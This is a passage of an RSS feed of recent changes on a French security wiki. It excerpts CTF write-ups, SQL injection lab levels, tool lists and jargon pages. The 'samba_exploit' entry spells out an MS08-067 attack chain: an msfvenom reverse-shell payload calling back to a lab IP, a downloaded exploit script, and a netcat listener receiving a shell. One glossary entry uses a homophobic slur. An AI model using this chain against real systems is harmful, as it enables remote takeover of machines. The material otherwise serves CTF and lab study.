# echo QlpoOTFBWSZTWTxSmOAAAAsJAF/gOwAgADEAAAiZMNT0JbKzhCQcyQtA2gNbvXgSvxdyRThQkDxSmOA= | base64 -d &gt; file
# bzip2 -d -9 file</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_forensics1&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>pwnium2k14_forensics1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium2k14_forensics1&amp;rev=1491744837&amp;do=diff</link>
        <description>----------

forensic1

----------

file : for1.pcapng&lt;https://mega.co.nz/#!4tQi3ZrA!okR5Jo6rijfi5CkwP3zu2_pKQ_ezaNZs5aLTBQCPFN8&gt;

c'est un dump USB

trame usb (Dumpcap 1.10.8)

le pkt 902

50:77:6e:69:75:6d:7b:34:30:38:31:35:38:63:31:31:35:61:38:32:31:37:35:64:65:33:37:65:38:62:33:32:39:39:64:31:66:39:33:7d:0a:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_misc1&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>pwnium2k14_misc1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium2k14_misc1&amp;rev=1491744837&amp;do=diff</link>
        <description>Cette épreuve à 1 point consistait à copier / coller le flag qui était affiché.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_misc2&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>pwnium2k14_misc2</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium2k14_misc2&amp;rev=1491744837&amp;do=diff</link>
        <description>----------

MISC Look Closer

----------

MISC.rar est un jpg &lt;https://mega.co.nz/#!UthnVS4R!9pAbmQwkh3DpBgp1nHtRv-FJKqI9zY8oms_212FcsLU&gt;

renommer Misc.jpg 

ouvrir dans paint 

zoom à fond

parcourir 

Pwnium{361a8212dda49824b8fdb70ce48f2f60}</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_prog1&amp;rev=1404652942&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-07-06T15:22:22+02:00</dc:date>
        <title>pwnium2k14_prog1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium2k14_prog1&amp;rev=1404652942&amp;do=diff</link>
        <description>Énoncé

Le but de cette épreuve était de battre le jeu 2048 en moins de 3:30.
Pour rappel, le but du jeu est d'obtenir le nombre 2048 en fusionnant les numéros qui apparaissent sur le plateau.

Une fois connecté au serveur via netcat, ce dernier renvoyait le challenge de cette manière :</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_reverse1&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>pwnium2k14_reverse1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium2k14_reverse1&amp;rev=1491744837&amp;do=diff</link>
        <description>L'épreuve consiste en un ELF qui répète « Baby Crackme » si on le lance.
En l'ouvrant avec IDA, on remarque qu'il compare argc avec 1, et saute ailleurs si c'est strictement plus grand.

Le code vers le quel il saute est le suivant : 


.text:08048471 loc_8048471:                            ; CODE XREF: main+Dj
.text:08048471                 mov     dword ptr [esp], 'G' ; c
.text:08048478                 call    _putchar
.text:0804847D                 mov     dword ptr [esp], '0' ; c
.text:0804…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_reverse2&amp;rev=1404667200&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-07-06T19:20:00+02:00</dc:date>
        <title>pwnium2k14_reverse2</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium2k14_reverse2&amp;rev=1404667200&amp;do=diff</link>
        <description>Cette épreuve est constituée d'un exécutable livré avec SDL.dll

Quand on lance l'exécutable, on nous propose de jouer à un clone du jeu Snake :

 




En reversant l'application avec IDA, on localise le main en 0x402A98 grâce aux appels de l'API de SDL servant à initialiser la librairie ainsi que la fenêtre SDL :</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_web2&amp;rev=1404667433&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-07-06T19:23:53+02:00</dc:date>
        <title>pwnium2k14_web2</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium2k14_web2&amp;rev=1404667433&amp;do=diff</link>
        <description>Cette épreuve est relativement simple, mais tire sa difficulté dans le fait qu'elle a été release dans la dernière demi heure avant la fin du CTF.

Le site web est constitué d'un simple formulaire authentification, composée d'un champ de Login / Password.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium_ctf&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>pwnium_ctf</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium_ctf&amp;rev=1491744837&amp;do=diff</link>
        <description>Reverse

	*  Baby crackme
	*  Old World
	*  Kernel Land
	*  NoDebug
	*  Breakpoints

Web

	*  GuestBook
	*  XPath

Pwn

	*  pwn100
	*  Be a robot

Misc

	*  main()
	*  Look Closer
	*  So basic
	*  is_empty?
	*  Number and sh*t
	*  Remote KG

Crypto

	*  break_me</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium_ctf2k14&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>pwnium_ctf2k14</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium_ctf2k14&amp;rev=1491744837&amp;do=diff</link>
        <description>Reverse

	*  Baby crackme
	*  Old World
	*  Kernel Land
	*  NoDebug
	*  Breakpoints

Web

	*  GuestBook
	*  XPath

Pwn

	*  pwn100
	*  Be a robot

Misc

	*  main()
	*  Look Closer
	*  So basic
	*  is_empty?
	*  Number and sh*t
	*  Remote KG

Crypto

	*  break_me</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=python&amp;rev=1572001104&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:58:24+02:00</dc:date>
        <title>python</title>
        <link>http://wiki.zenk-security.com/doku.php?id=python&amp;rev=1572001104&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 [bandit](&lt;https://github.com/PyCQA/bandit&gt;) - a tool to find common security issues in Python code

🛠 [bellybutton](&lt;https://github.com/hchasestevens/bellybutton&gt;) - a linting engine supporting custom project-specific rules</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=quelque_outils_en_ligne&amp;rev=1558890631&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-05-26T19:10:31+02:00</dc:date>
        <title>quelque_outils_en_ligne</title>
        <link>http://wiki.zenk-security.com/doku.php?id=quelque_outils_en_ligne&amp;rev=1558890631&amp;do=diff</link>
        <description>Online steganography service, hide message or file inside an image : &lt;https://www.mobilefish.com/services/steganography/steganography.php&gt;

Forensic-magnifier : &lt;https://www.mobilefish.com/services/steganography/steganography.php&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=rainbow_table&amp;rev=1341238385&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-07-02T16:13:05+02:00</dc:date>
        <title>rainbow_table</title>
        <link>http://wiki.zenk-security.com/doku.php?id=rainbow_table&amp;rev=1341238385&amp;do=diff</link>
        <description>Time-Memory Trade-Off

La première idée pour ce compromis temps-mémoire a été publiée par M. E. Hermann en 1980 et améliorée par Rivest (un des Mr RSA) en 1982.
 Le principe est de calculer un certain nombre m de chaînes de hash de longueur t (longueur de la chaîne, pas du hash).
On doit se fixer un espace de clef précis (key space en anglais). Par exemple, [[:digit:]]{1,5}.
On donne le nombre de mots de passe total N.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ransomware&amp;rev=1584916816&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-03-22T23:40:16+02:00</dc:date>
        <title>ransomware</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ransomware&amp;rev=1584916816&amp;do=diff</link>
        <description>Ransomware Overview : &lt;https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml#&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=raspberry_pi&amp;rev=1576987687&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-12-22T05:08:07+02:00</dc:date>
        <title>raspberry_pi</title>
        <link>http://wiki.zenk-security.com/doku.php?id=raspberry_pi&amp;rev=1576987687&amp;do=diff</link>
        <description>[Raspberry Pi Model B]
[Raspberry Pi logo]

Le Raspberry Pi est un ordinateur monocarte à taille carte de crédit de très faible coût qui a été conçu dans le but principal d'enseigner la programmation informatique aux enfants. Il a gagné une popularité parmi les hackers de matériel.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger&amp;rev=1491744837&amp;do=diff</link>
        <description>Adresse du hackit : http://redtiger.labs.overthewire.org

Nombre de niveaux : 10

	*  Level 1
	*  Level 2
	*  Level 3
	*  Level 4
	*  Level 5
	*  Level 6
	*  Level 7
	*  Level 8
	*  Level 9
	*  Level 10</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level1&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger_level1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level1&amp;rev=1491744837&amp;do=diff</link>
        <description>Redtiger level 1

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level1.php&gt;

Dans ce premier niveau, nous avons accès à une page prenant en paramètre un numéro de catégorie. Un indice concernant le nom d’une table de la base de données est également présent : level1_users.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level10&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger_level10</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level10&amp;rev=1491744837&amp;do=diff</link>
        <description>Redtiger level 10

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level10.php&gt;

L'objectif de ce dernier challenge est d'obtenir un accès au compte de l'utilisateur TheMaster. Lors de la soumission du formulaire, une chaîne encodée en base64 est envoyée au serveur.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level2&amp;rev=1434909115&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2015-06-21T19:51:55+02:00</dc:date>
        <title>redtiger_level2</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level2&amp;rev=1434909115&amp;do=diff</link>
        <description>Redtiger level 2

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level2.php&gt;

Pour ce niveau 2, un formulaire d'identification est affiché.



Notre objectif est donc d'outrepasser cette identification pour nous connecter. Pour cela, nous devons injecter un payload qui fera de la requête finale une condition vraie.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level3&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger_level3</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level3&amp;rev=1491744837&amp;do=diff</link>
        <description>Redtiger level 3

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level3.php&gt;

Cette épreuve nous présente une page prenant en paramètre une chaîne de caractère et affichant des informations sur un utilisateur. Nous supposons que cette chaîne de caractère est chiffrée du fait de sa forme ressemblant à l'algorithme Base64.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level4&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger_level4</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level4&amp;rev=1491744837&amp;do=diff</link>
        <description>Redtiger level 4

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level4.php&gt;

Cette épreuve se présente sous la forme d'une page présentant le nombre de résultats retournés par une requête MySQL. Ce résultat change en fonction du paramètre id de l'url : http://redtiger.labs.overthewire.org/level4.php?id=1.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level5&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger_level5</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level5&amp;rev=1491744837&amp;do=diff</link>
        <description>Redtiger level 5

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level5.php&gt;

Cette épreuve repose sur une mauvaise implémentation (encore une fois). Notre objectif ici est d'outrepasser l'authentification en sachant que le mot de passe est chiffré en utilisant l'algorithme MD5.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level6&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger_level6</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level6&amp;rev=1491744837&amp;do=diff</link>
        <description>Redtiger level 6

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level6.php&gt;

Dans cette épreuve, il fallait comprendre que deux requêtes étaient imbriquées l'une dans l'autre. Le résultat de la première était utilisé pour la deuxième.
Un indice est donné; nous devons récupérer le premier utilisateur de la table level6_users avec un statut égale à 1.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level7&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger_level7</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level7&amp;rev=1491744837&amp;do=diff</link>
        <description>Redtiger level 7

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level7.php&gt;

Dans cette épreuve, l'objectif est de récupérer le nom d'utilisateur ayant posté une news à propos de google.
Un indice est donné; celui de la colonne autor dans la table level7_news.
Un champ de recherche est disponible sur la page, en l'utilisant simplement, cela donne :</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level8&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger_level8</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level8&amp;rev=1491744837&amp;do=diff</link>
        <description>Redtiger level 8

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level8.php&gt;

Dans cette épreuve, notre objectif est de récupérer le mot de passe de l'administrateur.
Nous avons un formulaire permettant de modifier ses informations. Contrairement aux précédents challenges, notre injection se fera via une requête de type UPDATE.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=redtiger_level9&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>redtiger_level9</title>
        <link>http://wiki.zenk-security.com/doku.php?id=redtiger_level9&amp;rev=1491744837&amp;do=diff</link>
        <description>Redtiger level 9

Adresse de l’épreuve : &lt;http://redtiger.labs.overthewire.org/level9.php&gt;

L'objectif de ce challenge est de récupérer les mots de passes et nom d'utilisateur de la table level9_users. Il est spécifié que ce n'est pas une injection de type BLIND.
Le champ texte est vulnérable aux injections.
En testant un payload valide; nous nous sommes rendu compte que le script n'affichait que les chiffres. En effet, avec un payload comme ceci, le résultat de l'opération est affiché:…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=reseaux_sociaux&amp;rev=1585692236&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-04-01T00:03:56+02:00</dc:date>
        <title>reseaux_sociaux</title>
        <link>http://wiki.zenk-security.com/doku.php?id=reseaux_sociaux&amp;rev=1585692236&amp;do=diff</link>
        <description>Tous

	*  Eagle Eye Le but estr de trouver les principaux réseaux sociaux de John Doe &lt;https://github.com/ThoughtfulDev/EagleEye&gt;
	*   Obtenir les comptes de notre cible sur les principaux réseaux sociaux. &lt;https://www.lusha.co/&gt;

Facebook

	*  Facebook_OSINT_Dump Outil Windows permettant de faire de l’OSINT sur les profiles Facebook. &lt;https://github.com/TheCyberViking/Facebook_OSINT_Dump&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=reverse_engineering&amp;rev=1553091543&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-03-20T15:19:03+02:00</dc:date>
        <title>reverse_engineering</title>
        <link>http://wiki.zenk-security.com/doku.php?id=reverse_engineering&amp;rev=1553091543&amp;do=diff</link>
        <description>Cette page a pour but de réunir différents articles sur le reverse-engineering

	*  GDB Cheatsheet : un document qui récapitule diverses astuces pour GDB
	*  Ghidra : Listes de ressources sur Ghidra</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=richard_stallman&amp;rev=1517075776&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-27T18:56:16+02:00</dc:date>
        <title>richard_stallman</title>
        <link>http://wiki.zenk-security.com/doku.php?id=richard_stallman&amp;rev=1517075776&amp;do=diff</link>
        <description>[Richard Matthew Stallman]
 

 

 

 

 

 

 

 

 

 

Richard Matthew Stallman (rms) est un hacktiviste, programmeur, et militant du logiciel libre. Il est l'auteur du projet GPL et GNU.

Qui est-il, cependant?

Richard Stallman a commencé à travailler dur pour répliquer la sortie de l'équipe Unix, mais sous la GPL, ce qui signifiait que n'importe qui pouvait utiliser, lire, modifier ou distribuer le code source. Une fois que cela a été combiné par Linus Torvalds avec le noyau de Torvalds, GN…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=rtfm&amp;rev=1517074179&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-27T18:29:39+02:00</dc:date>
        <title>rtfm</title>
        <link>http://wiki.zenk-security.com/doku.php?id=rtfm&amp;rev=1517074179&amp;do=diff</link>
        <description>RTFM (Read the Fucking Manual), est une phrase auto-explicative qui remonte à l'antiquité, généralement en réponse à de nouvelles faggotries.

Utilisation

Quand un nouveau pose une question évidente, plutôt que d'amuser leur stupidité, on leur dit simplement “RTFM”.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ruby&amp;rev=1572001144&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:59:04+02:00</dc:date>
        <title>ruby</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ruby&amp;rev=1572001144&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 [brakeman](&lt;https://github.com/presidentbeef/brakeman&gt;) - A static analysis security vulnerability scanner for Ruby on Rails applications

🛠 [cane](&lt;https://github.com/square/cane&gt;) - Code quality threshold checking as part of your build</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ruby_on_rails&amp;rev=1572001127&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:58:47+02:00</dc:date>
        <title>ruby_on_rails</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ruby_on_rails&amp;rev=1572001127&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

&lt;http://brakemanscanner.org/&gt; - A static analysis security vulnerability scanner for Ruby on Rails applications</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=rue&amp;rev=1516583291&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-22T02:08:11+02:00</dc:date>
        <title>rue</title>
        <link>http://wiki.zenk-security.com/doku.php?id=rue&amp;rev=1516583291&amp;do=diff</link>
        <description>Rich User Experience (ou RUE en abrégé) est un terme inventé par l'artiste net et philosophe Olia Lialina dans un essai publié début 2015. Un RUE est un site qui essaie trop dur d'émuler un logiciel, et donne une sensation de convivialité quand il n'en faut pas. Il peut également s'agir d'un SaaS Web 2.0. Essentiellement, tout site Web qui a quelque chose qui pourrait être fait dans 1 Mo mais prend 40 Mo, et supprime d'une manière la liberté à l'utilisateur final, est un RUE. Un RUE est la plupa…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=samba_exploit&amp;rev=1601326762&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-09-28T22:59:22+02:00</dc:date>
        <title>samba_exploit</title>
        <link>http://wiki.zenk-security.com/doku.php?id=samba_exploit&amp;rev=1601326762&amp;do=diff</link>
        <description>exploit SMB VULN MS08-067


msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b &quot;\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40&quot; -f py -v shellcode -a x86 --platform windows
wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
on copie le shellcode dans le commentaire
python ms08-067.py 10.10.10.4 6 445
root@kali:~/OSCP/VMs/10.10.10.4/MS17-010# netcat -lnvp 443
listening on [any] 443 ...

C:\WINDOWS\system32&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=scala&amp;rev=1572001159&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:59:19+02:00</dc:date>
        <title>scala</title>
        <link>http://wiki.zenk-security.com/doku.php?id=scala&amp;rev=1572001159&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 [linter](&lt;https://github.com/HairyFotr/linter&gt;) - Linter is a Scala static analysis compiler plugin which adds compile-time checks for various possible bugs, inefficiencies, and style problems.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=sciences_participatives&amp;rev=1615114294&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-03-07T11:51:34+02:00</dc:date>
        <title>sciences_participatives</title>
        <link>http://wiki.zenk-security.com/doku.php?id=sciences_participatives&amp;rev=1615114294&amp;do=diff</link>
        <description>Les sciences participatives (parfois appelées «sciences citoyennes» ou «sciences collaboratives») sont «des formes de production de connaissances scientifiques auxquelles des acteurs non-scientifiques-professionnels — qu’il s’agisse d’individus ou de groupes — participent de façon active et délibérée».</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=scoreboard&amp;rev=1697807778&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2023-10-20T15:16:18+02:00</dc:date>
        <title>scoreboard</title>
        <link>http://wiki.zenk-security.com/doku.php?id=scoreboard&amp;rev=1697807778&amp;do=diff</link>
        <description>CTF Purple pill


Rank: 01  Points: 28001 Team: Hackwakwnd
...
Rank: 13  Points: 1160 Team: Gardian pack
Rank: 14  Points: 1150 Team: Zenk


CTF Barbhack


Rank: 01  Points: 6778 Team: Synacktiv
...
Rank: 10  Points: 2174 Team: ZeOS by HiP
Rank: 11  Points: 2093 Team: Hackcyom
Rank: 12  Points: 1768 Team: ZENK - RED PEARL</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=script_kiddie&amp;rev=1509839211&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T00:46:51+02:00</dc:date>
        <title>script_kiddie</title>
        <link>http://wiki.zenk-security.com/doku.php?id=script_kiddie&amp;rev=1509839211&amp;do=diff</link>
        <description>[&quot;Code by Numbers&quot; (c)2001 Bill Holbrook.]

Un Script Kiddie (aussi appelé skid) est un terme utilisé pour désigner les enfants idiots qui trouvent des extraits de code sur Internet, les compilent ensemble, et en font un virus ou un autre programme malveillant qu'ils ne savent pas contrôler, ni même ne comprennent.  

Ces personnes causent de la confusion, du retard et nuisent à tout le monde. 

En raison de leur analphabétisme technologique, ils sont généralement rapidement trouvés, arrêtés et …</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=securite_web&amp;rev=1340798199&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-06-27T13:56:39+02:00</dc:date>
        <title>securite_web</title>
        <link>http://wiki.zenk-security.com/doku.php?id=securite_web&amp;rev=1340798199&amp;do=diff</link>
        <description>Choses à faire

----------

	*  Apprendre l'HTML et le CSS -&gt; Lien
	*  Apprendre le Javascript-&gt; Lien
	*  Apprendre le PHP -&gt; Lien - Lien - Lien
	*  Savoir à quoi sert le fichier robots.txt et en quoi celui-ci peut être utile dans la collecte d'information -&gt; Lien - Lien
	*  Comprendre comment fonctionne le vol de sessions -&gt; Lien
	*  Apprendre à éxploiter les XSS, persistantes et et non persistantes -&gt; Lien - Lien - Lien - Lien - Lien
	*  Apprendre à exploiter les CSRF  -&gt; Lien - Lien
	*  Appre…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=series_tv&amp;rev=1612039061&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-01-30T21:37:41+02:00</dc:date>
        <title>series_tv</title>
        <link>http://wiki.zenk-security.com/doku.php?id=series_tv&amp;rev=1612039061&amp;do=diff</link>
        <description>Cette page fournit une liste de séries tv qui gravite autour des sphères de la technologie, science-fiction, mais aussi des séries cyberpunks, etc...

Comédies

Max Headroom (1987 - 1988) 


	&quot; Basé sur le film du même nom. Pire que le film a tous les niveaux.
 Vous connaissez ça probablement seulement à cause de la fois ou une personne avais takeover une station de télé pour diffusé un signal pirate avec la tête de Max Headroom.&quot;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=series_tv_anime&amp;rev=1528702308&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-06-11T09:31:48+02:00</dc:date>
        <title>series_tv_anime</title>
        <link>http://wiki.zenk-security.com/doku.php?id=series_tv_anime&amp;rev=1528702308&amp;do=diff</link>
        <description>Cette page fournit une liste de séries d'animation qui gravite autour des sphères de la technologie informatique, science-fiction, cyberpunk.

Battle Programmer Shirase 

Battle Programmer Shirase (BPS バトルプログラマーシラセ, Bīpīesu Batoru Puroguramā Shirase) abrégé en BPS est une sérié animée japonaise comique sortie en 2003 et produite par AIC. La série compte 15 épisodes de 10 minutes chacun.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=shell&amp;rev=1577819754&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-12-31T20:15:54+02:00</dc:date>
        <title>shell</title>
        <link>http://wiki.zenk-security.com/doku.php?id=shell&amp;rev=1577819754&amp;do=diff</link>
        <description>🛠 ShellCheck - finds bugs in your shell scripts. &lt;https://www.shellcheck.net/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=shitposting&amp;rev=1517102572&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-28T02:22:52+02:00</dc:date>
        <title>shitposting</title>
        <link>http://wiki.zenk-security.com/doku.php?id=shitposting&amp;rev=1517102572&amp;do=diff</link>
        <description>Le Shitposting est l'acte d'afficher de grandes quantités de contenu agressivement, ironiquement, et de troll de ”mauvaise qualité” à un forum en ligne ou réseau social, dans certains cas destinés à faire dérailler une discussions ou rendre le site inutilisable pour ses visiteurs réguliers.
Le shitposting peut être défini comme un post non-constructif et sans valeur.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=sjw&amp;rev=1517094724&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-28T00:12:04+02:00</dc:date>
        <title>sjw</title>
        <link>http://wiki.zenk-security.com/doku.php?id=sjw&amp;rev=1517094724&amp;do=diff</link>
        <description>Les Social Justice Warrirors sont des gens qui s'offusquent au nom d'autres personnes, principalement sur des sujets de diversité, de racisme, de sexisme, d'homophobie, de transphobie, etc.

Warriors est le mot clé dans cette description. Alors que de nombreuses personnes ordinaires sont contre le racisme, un SJW va se battre dans la bataille pour se défendre contre tout racisme perçu, peu importe à quel point un saut logique doit être fait. Les commentaires humoristiques et sarcastiques sont so…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=sommaire&amp;rev=1435432415&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2015-06-27T21:13:35+02:00</dc:date>
        <title>sommaire</title>
        <link>http://wiki.zenk-security.com/doku.php?id=sommaire&amp;rev=1435432415&amp;do=diff</link>
